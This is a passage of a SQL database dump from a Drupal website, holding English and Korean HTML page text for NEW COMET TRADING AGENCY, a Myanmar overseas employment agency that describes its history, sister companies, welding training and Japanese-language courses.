style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 87, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 88, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span 